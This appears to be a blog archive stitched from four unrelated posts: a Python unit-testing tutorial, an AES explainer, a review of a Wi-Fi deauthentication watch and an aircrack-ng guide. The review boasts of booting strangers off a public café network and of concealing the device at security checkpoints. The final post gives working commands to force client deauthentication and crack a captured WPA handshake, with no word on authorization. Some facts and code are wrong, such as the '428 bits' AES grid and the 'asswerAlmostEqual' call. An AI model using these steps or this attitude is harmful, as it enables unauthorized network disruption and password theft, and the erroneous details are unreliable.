A huge shift has occurred in recent years of software development toward testing and ensuring that applications deliver absolute quality. With the advent of social networks and the ever-increasing pressure of media attention, defects in code could be costly to both the individual developer and the company reputation. Whether it be security flaws exposing sensitive customer data, defects that allow hackers access to deface your website, or simply a payment page failing to execute orders, errors can cost your business huge sums of money.

Don’t think of problems on only the large-scale, either. Without a proper testing suite in place, how do you know you have delivered the functionality you set out to deliver at the beginning of writing code? Take a simple data submission form. You have coded the fields to accept a name, address, and email, without any testing. You quickly entered the data as expected and your submit works fine. But what if customers enter something unexpected in the fields? Say for instance a number in the name field. Does the code handle this unwanted values? This kind of thing is what leads to some serious security issues as well as crashes.

You can certainly make great code without tests. The key advantage of writing tests is that testing gives confidence in code before it goes live. In some cases developers are on call to support applications in the middle of the night. Do you want a 2a.m. alert because someone missed an obvious issue after the fact. The other major benefit of testing code is ownership roll over. People come and go and the first person to build something, as time goes on, actually touches it less then the scores of devs that have to wrestle with it down the road.

Fundementals and best practices

Before jumping into the process of writing tests, a good idea is to take some time to get your machine in order and up to date with the tools you will need to proceed. First, make sure you have the correct version of Python installed. Then set up some of the basic tools Python developers use on a daily basis will mean you can easily follow the rest of the steps described here.

Linux

Most Linux distributions come with some version of Python installed. If for some reason you don’t have Python, or perhaps you have an older version, you usually install using your distributions package manager. If Python is not available in this way, then you can visit python.org to download the source and compile it yourself.

Mac

Like Linux, Apple ships a version of Python with every version of OS X. Therefore if you are using a mac you should be all set by default. If you find you need to get Python on your machine for some reason, then you could install a package manager for Mac. Homebrew is lightweight installation, and the install scripts are written in Ruby you can find more information here brew.sh about it.

Windows

Windows is considered a bit out of scope when it comes to this writing as I’m not in the best position to offer advice for it. However, that doesn’t mean the code and advice described are not useful to a Windows user.

Writing Unit Tests

In unit testing, you want to cover the application’s functionality at its most basic level. Then test each individual units of code, typically a method, in isolation to see if given certain conditions it responds in the expected way. Braking testing down to this level gives confidence that each part of the application will behave as expected and enables the coverage of edge cases.

What Should You Test

When first looking into unit testing its natural to ask, what should I test? This is a fair question as applications that are being build nowadays are vast with many complicities. However, unit testing makes the task easier as the whole idea is to focus on the smallest units of code rather than thinking about how to test the large application you are putting together as a whole. Be warned tho as some make tests so focused that they break with data changes and not with functionality changes. Which is what unit testing is really looking to test. So a good rule of thumb to follow is test at the C.R.U.D.(Create. Read. Update. Delete) level and no lower.

Writing Your First Unit Test

I’m sure reaching to this part you are ready to start writing tests. The first example with show you how to structure your test into a class with the correct naming conventions. This will be a great reference area if you need a reminder on how to setup a new structure. The examples following that will be more of the snippets of test methods that will be used inside of a test class.

One of the classic examples for demonstrating unit testing is a small calculator program. Python includes a lot of basic math functionality in the library. This first scenario demonstrates how to implement the calculate class of of a simple calculator program.

class Calculate(object):
    def add(self,x,y):
        return x + y

if __name__ == '__main__':
    calc = Calculate()
    result = calc.add(2,2)
    print(result)

This is a very simple class that is just making use of Python’s built-in math function but we just need something so everyone starts with same footing. Save this code to a file named calculat.py, then execute the code. You should see the end result as follows.

$ python calculate.py
4

Now that we standardized code to look at lets get into writing a test for it. For this we are going to make a file called calculate_test.py, this follows the standard naming conventions of using the class name under test and appending the _test. Save it in a folder called test at the same level as the previous files level. This will be helpful when you have dozens of files that need to be tested in a single repo. Now for the code that goes into calculate_test.py.

import unittest
from app.calculate import Calculate


class TestCalculate(unittest.TestCase):
    def setUp(self):
        self.calc = Calculate()

    def test_add_method_returns_correct_result(self):
        self.assertEqual(4, self.calc.add(2,2))


if __name__ == '__main__':
    unittest.main()

For some this is a lot so lets cover it line-by-line. First imports the functionality you need from Python’s unittest module. We are also importing the class we wrote back in calculate.py, so we can test it’s method. We do this in the setUp method, which is executed before each test, so that we only need to define our instance once and have it created before each test. Then we can write our test and the standard is to append our test name with append_test and explain what the test is doing briefly in the rest of the name. Here we are checking if the add method returns the correct result. We do this by maing use of the assertEqual method provided by the imported unittest module. This checks if the first argument is equal to the second. In the example we just went over we are checking whether 4 is equal to the result of calling the add method in calculate.py with the arguments 2 and 2. In this case everything works out.

$ python test/calculate_test.py
.
------------------------------------------------------
Ran 1 test in 0.001s
OK

Useful Methods in Unit Testing

Below provides a quick guide to many different methods available in the unit test package. For each one, a description of its usage and an example are provided. All methods that take an optional argument, msg=None, can be provided a custom message that is displayed on a failure.

assertEqual(x, y, msg=None)
This method checks to see whether argument x equals argument y. Under the covers, this method is performing the check using the == definition for the objects.

def test_assert_equal(self):
    self.assertEqual(1, 1)

assertAlmostEqual(x, y, places=None, msg=None, delta=None)

On first glance, this method may seem a little strange but in context becomes useful. The method is basically useful around testing calculations when you want a result to be within a certain amount of places to the expected, or within a certain delta.

def test_assert_almost_equal_delta_0_5(self):
    self.assertAlmostEqual(1, 1.2, delta=0.5)

def test_assert_almost_equal_places(self):
    self.asswerAlmostEqual(1, 1.00001, places=4)

Following the PEP-8 standard

As you have been introduced to unit testing in Python, it should be clear that various patterns and standards are followed within the Python community. Some of them are enforced by tools you may wish to use, such as prepending a test name with “test_” to allow runners to keep readability and reuse of code high as it is shared between developers. It helps to give Python code a consistent look and feel that experienced developers are familiar with, and if teams adhere to the accepted standards then when developers move to a new Python project, many aspects of the code should feel familiar.

All Python developers code should conform to the standards outlined within the PEP-8 document. The document is one of the most famous PEPs (Python Enhancement Proposals) not to mention one of the earliest. PEP-8 focuses on the styling of code and puts forward some of the fundamental principles when writing Python code and tests, such as the following.

  • Indents: Four spaces for each indentation
  • Maximum line length: 80 Characters.
  • Blank lines: Two between import, class, and function definitions. One between method definitions inside a class.
  • Import statements: Should be one per line.
  • Class names: Should have capitals for the first letter of each word.
  • Method names: Should use all lowercase and underscores to separate words.

Unit Test Structure

When structuring a project, you can follow some clear standards to make an application’s code more accessible to other Python developers. These simple rules are easy to apply and result in an uniform structure to make it easy to find the test and code files needed.

  • Unit tests should be placed under a test/unit directory at the top level of a project folder.
  • All folders within the application’s code should be mirrored by test folders under test/unit, which will have the units tests for each file in them. For example, app/data should have a mirrored folder of test/unit/app/data.
  • All unit test files should mirror the name of the file they are testing, with _test as the suffix. For example, app/data/data_interface.py should have a test file of test/unit/app/data/data_interface_test.py.

Going further

A lot has been covered here but it is by no means an exhaustive description on Python testing. Thing to look into from hear includes TDD (Test Driven Development), Acceptance Testing, writing testable documentation, Automating Testing, and Working on Public code. But for now this is a great place to start getting familiar with Python testing and how you can work it into your projects.

AES Explained (Advanced Encryption Standard)

In this post we are going to delve into AES (Advanced Encryption Standard). We will cover everything from what’s good about it, how it works, and why it was judged “good enough” to the Standard for encryption.

How AES Works

This is going to be a bit of a rough ride if this is your first introduction to how encryption works down at a bit level. But hold on and I promise in time it will make more sense the more you read it. AES is a 128-bit symmetric block cipher. This means it takes 128 bits of a message and it encrypts it into 128 bits of ciphertext with a key. The key can either be 128, 192, or 256 bits and that gives you just varying amounts of security. And if you are thinking that 128 is weak it is only when compared to its 256 counterpart. Based off of other encryptions the 128 is still very secure.

So don’t worry about it if you find your browser is using the 128 bit version, theses were specified as part of the AES standard. Alright lets get right into it we’re going to be doing some amount of substitution or bringing in some confusion and some amount of permutation. Moving things around to add diffusion. You don’t want just like the Enigma machine to have one byte in one byte out because that would make it easier to analyze and proven historically to be the case. In stead of having a long line of bits or bytes like most ciphers might arrange things AES lies to arrange things in a grid. Making it a block cypher, which takes chunks at a time and encrypts them.

The grid that AES uses 4×4 grid of 428 bits (16 bytes). So we can have a message which is 128 bit as a 4×4 grid starting with byte 00 at the top left and filling the grid top to bottom left to right it will come out looking like the example bellow.

byte
00
byte
04
byte
08
byte
12
byte
01
byte
05
byte
09
byte
13
byte
02
byte
06
byte
10
byte
14
byte
03
byte
07
byte
11
byte
15

So using this example we’re going to start doing our SP network we’re going to substitute bytes and then transform them into some way where an attacker can’t read what the message used to be. There are a few different operations that AES will do. But remember everything in AES happens on the 4×4 grid described above. We are going to be diving into more depth but here is the main work flow of AES

  • Plaintext
  • Preform XOR using key and plaintext
  • Entering into rounds
    • Substitute Bytes
    • Row Shifting
    • Column Mixing
    • Add round key

The most interesting thing at first glance is going to be the rounds. This is where the different bits we talked about comes into play. They are the determining factor of how many rounds you have. 128 bit key has 10 rounds, 192 bit key has 12 rounds, and the 256 bit key has 14 rounds. I’m not going to go into details about the key schedule as its effect is just meant to be fast. Basically with AES is just takes your shorter key and expands it sufficiently such that you can put it in at these different rounds.

How Secure Is AES 256?

If AES is the gold standard, 256-bit encryption is its poster child. With the longest rounds, the 256-bit key provides the strongest level of encryption.

It is near impossible to crack it even if brute force is applied – trying every combination of numbers possible until the correct key is found. The longer the key size, the more attempts are needed.

A hacker trying to crack a 256-bit key would need 2 to the power of 256 attempts to find the right key. Even if hackers use Tianhe-2 (MilkyWay-2), the fastest supercomputer in the world, it will take them a few million lifetimes to crack a 256-bit AES encryption.

The bottom line is, entities that face threats from all directions, like the U.S. Military or your Office 365 that stores business-critical information, need AES 256-bit protection.

DSTIKE Deauther Watch Tutorial and Review

Have you wanted to play around with the limitless wifi around you but didn’t bring your laptop. Well luckily this sweet little watch is the perfect answer to just that problem. I’m going to be going over the controls in more depth below I figure I should give you a link to see what I’m talking about if this is your first time hearing about this watch. (DSTIKE Watch)

After I got mine its been a blast to play around with as well as give live impromptu demonstrations about the dangers and limitations of wifi that everyone takes for granted. Their was even one time I needed to free up some bandwidth on a public wifi for a download so I kind of booted everyone but me off the network for a bit. Sorry script writers at Starbucks but my VM download trumps your “Next Big Story”. If you’re just getting into playing with wifi networks from a pentesting standpoint or want to get a more hands on feel for what deauthing is like in the wild I can’t recommend this device more. Its the next best thing to a pineapple but that is for another post.

Controls Explained

From first powering on the watch you will be given a boot message telling you information about the board used, who developed it @Spacehuhn, and what version the deauther watch is running. After that message dissapears you will be given the ability to choose from six different menu options.

  • SCAN
  • SELECT
  • ATTACK
  • PACKET MONITOR
  • CLOCK
  • LED

SCAN

Scan is used to discover access points as well as wifi stations within rang of the watch. Unfortunately due to the limitation of the hardware’s chipset it won’t be able to discover or interact with 5g signals. But don’t worry cell phones are still susceptible to this watch thanks to the dual band setup they use. While it can scan for APs and STs at the same time, which honestly is what I use 90% of the time when I scan, you can go a more stealthy route and only scan one or the other. This will just depend on objective and personal preference.

SELECT

Select is going to be the next option on the list from the home menu as well as your next step after a scan has been completed. Any access points and stations picked up by DSTIKE will be stored here. Simply select either the APs or Stations options to start selecting them. The APs will show the names of the as you would see them if you were to connect from your cell phone. For example NETGEAR65-2G, GirlsGoneWireless, Xfinitynew etc. You can either click each one on the list that you would like to use or at the bottom of the list you get the option to SELECT ALL the same goes with DESELECT ALL and REMOVE ALL. Remove all will remove them from the select list and would require a new scan to populate the select list again.

ATTACK

Attacking is probably the most enjoyable part to this whole watch. After all its called DSTIKE Deauther not DSTIKE Conversation Piece. After you’ve selected the targets you would like to deauthenticate in the select option described above simply select DEAUTH and hit start. This will start sending deauth packets to the selected targets for as long as you are running the attack. Under the attack option you also have the option to send out a Beacon attack this will tell the surrounding area that APs in the area for connection. By default these APs are the lyrics to the Rick Roll. You can change the names that the beaconing attack will spawn inside the watches settings. The watch will allow you to deploy both deauth and beacon attacks at the same time. Once the attack is started the green indicator light will turn red alerting you that an attack is underway. Just make sure to turn the attack off when your done as to not drain the battery unnecessarily.

PACKET MONITOR

Packet monitor is really one of the coolest setting to use for me. By selecting this option you get to see in real time the about of packets being sent around on the different channels. It can listen on channels 1 to 14 and is super useful if your interested in what the wifi area looks like. When using the watch in a new area I like flipping around the channels to see which one has the most traffic. The real fun starts though when you find a channel that has low traffic on it compared to the others in the area. Is someone trying to play around with their own wifi hacking tools? Is it the channel a business is using to separate the staff from the public? No matter the answer unique is always worth the look.

CLOCK

The clock is a nice little feature that simply displays the time in minutes since it was last turned on. I particularly like this for the fact that its less suspicious to have a watch displaying a time rather then showing bar graphs of the current amount of packets flying by on some wireless channel. Trust me you go threw a metal detector at your favorite amusement park or airport you have a lot less explaining to do if you use this display.

LED

This option is really the most self explanatory. You select this option an LED turns on at the base of the watch. A little too spy kids of a feature to me but it does stop me from needing get my phone when I need to read in a dark room I shouldn’t be in.

If you’ve made it to the end congrats! This really is a fun tool to use. Of course if you’ve hit this page because you got yours already and wanted some answers on what it does you already know how cool it is. If you’ve reached the bottom and would now like to get your hands on one feel free to use This Link and get started right away.

How to use aircrack-ng for Wi-Fi Recon and Hacking

One of the most popular exploits for new hackers to try is cracking Wi-Fi access points. Before someone can even consider attacking a Wi-Fi AP, they need the MAC address of the target AP (also know as the BSSID), the MAC address of the client, and the channel the AP is operating on. All this information and more can be found using the tools in the aircrack-ng suite. This suite of tools is included by default in every version of Kali, so if you’ve got you real hacker hat on you don’t need to apt-get anything.

The first step to get started is to put your wireless network card into monitor mode. This mode allows your card to see all the traffic around it similarly to promiscuous mode for wired network cards. The aircrack way of doing this is as follows:

root@kali: ~# airmon-ng start wlan0

wlan0 in this case is the default wireless network interface if the command runs into trouble make sure that wlan0 is in fact there using the ifconfig command. Once your wireless card is in monitor mode airmon-ng will rename the interface something like “wlan0mon” take note of this rename it will be important later.

Now that we are listening to all the packets flying by our heads its time to start doing something with them and that is where airodump-ng command comes into play. Airodump-ng captures and displays the key data from all the broadcasting APs as well as the clients connected to those APs. The command to do this is as follows:

root@kali: ~# airodump-ng wlan0mon

Airodump-ng will split the output screen into an upper and lower portion. The upper portion has information on the broadcasting APs including:

  1. BSSID: MAC address of the AP or client
  2. PWR: power of the AP (the strength of the signal)
  3. Beacons:how many beacon frames have been detected
  4. #Data: data throughput rate
  5. #/s: how many packets have traversed the wireless card
  6. CH: channel (1-14)
  7. MB: theoretical throughput limit
  8. ENC: encryption protocol
  9. CIPHER: cipher used for encryption
  10. AUTH: authentication type
  11. ESSID: (also know as the SSID)

Now that all the information needed to crack the AP lets get to the crack itself. To crack the Wi-Fi password you can open three terminals or tabs in the same terminal. In the first you would enter commands similar to the following:

root@kali: ~# airodump-ng -c 10 --bssid 01:02:AA:BB:CC:22 -w <capture_output> wlan0mon

That command captures all the packets traversing the AP on channel 10 (-c 10) to the location of your output file (-w <file_name>). In the second terminal we are going to use aireplay-ng to deauthenticate anyone connected to the AP. This will force them to reauthenticate with the AP. The reason for this we are going to be capturing the authentication hash that gets passed in the four-way handshake. This speeds up the creaking process as you would need a large amount of random packets captured otherwise. The command to do this is as follows:

root@kali: ~# aireplay-ng --deauth 100 -a 01:02:AA:BB:CC:22 -c AO:A2:E1:33:7C:E5 wlan0mon

And in the last terminal, we can use a password list to find the password in the captured hash file (this will be the output in .cap format). This command will do just that:

root@kali: ~# aircrack-ng -w wordlist.dic -b 01:02:AA:BB:CC:22 capture_output.cap